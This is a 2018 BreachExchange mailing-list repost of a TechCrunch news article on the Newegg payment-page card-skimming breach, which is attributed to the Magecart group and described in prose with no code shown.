[BreachExchange] Hackers stole customer credit cards in Newegg data breach

Destry Winant destry at riskbasedsecurity.com
Thu Sep 20 00:28:56 EDT 2018


https://techcrunch.com/2018/09/19/newegg-credit-card-data-breach/

Newegg  is clearing up its website after a month-long data breach.

Hackers injected 15 lines of card skimming code on the online
retailer’s payments page which remained for more than a month between
August 14 and September 18, Yonathan Klijnsma, a threat researcher at
RiskIQ, told TechCrunch. The code siphoned off credit card data from
unsuspecting customers to a server controlled by the hackers with a
similar domain name — likely to avoid detection. The server even used
an HTTPS certificate to blend in.

The code also worked for both desktop and mobile customers — though
it’s unclear if mobile customers are affected.

The online electronics retailer removed the code on Tuesday after it
was contacted by incident response firm Volexity, which first
discovered the card skimming malware and reported its findings.

Newegg is one of the largest retailers in the US, making $2.65 billion
in revenue in 2016. The company touts more than 45 million monthly
unique visitors, but it’s not known precisely how many customers
completed transactions during the period.

In an email to customers, Newegg chief executive Danny Lee said the
company has “not yet determined which customer accounts may have been
affected.” When reached, a Newegg spokesperson did not immediately
comment.

Klijnsma called the incident “another well-disguised attack” that
looked near-identical to the recent British Airways credit card
breach, and earlier, the Ticketmaster breach. Like that breach, RiskIQ
attributed the Newegg credit card theft to the Magecart group, a
collective of hackers that carry out targeted attacks against
vulnerable websites.

The code used in both skimming attacks was near identical, according
to the research.

“The breach of Newegg shows the true extent of Magecart operators’
reach,” said Klijnsma. “These attacks are not confined to certain
geolocations or specific industries—any organization that processes
payments online is a target.”

Like previous card skimming campaigns, he said that the hackers
“integrated with the victim’s payment system and blended with the
infrastructure and stayed there as long as possible.”

Anyone who entered their credit card data during the period should
immediately contact their banks.


More information about the BreachExchange mailing list